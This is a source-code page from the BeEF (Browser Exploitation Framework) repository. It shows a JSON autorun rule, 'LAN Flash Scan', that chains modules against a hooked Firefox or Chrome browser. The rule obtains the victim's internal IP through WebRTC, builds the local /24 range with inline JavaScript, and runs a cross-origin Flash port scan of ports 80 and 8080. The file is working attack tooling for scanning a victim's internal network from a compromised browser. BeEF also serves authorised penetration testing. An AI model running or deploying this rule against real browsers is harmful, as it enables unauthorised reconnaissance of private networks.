Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/arerules/lan_flash_scan.json
1146 views
1
{"name": "LAN Flash Scan",
2
"author": "bcoles",
3
"browser": ["FF", "C"],
4
"modules": [
5
{"name": "get_internal_ip_webrtc",
6
"condition": null,
7
"code": null,
8
"options": {}
9
},
10
{"name": "cross_origin_scanner_flash",
11
"condition": "status==1",
12
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
13
"options": {
14
"ipRange":"<<mod_input>>",
15
"ports":"80,8080",
16
"threads":"2",
17
"timeout":"5"
18
}
19
}
20
],
21
"execution_order": [0, 1],
22
"execution_delay": [0, 0],
23
"chain_mode": "nested-forward"
24
}
25
26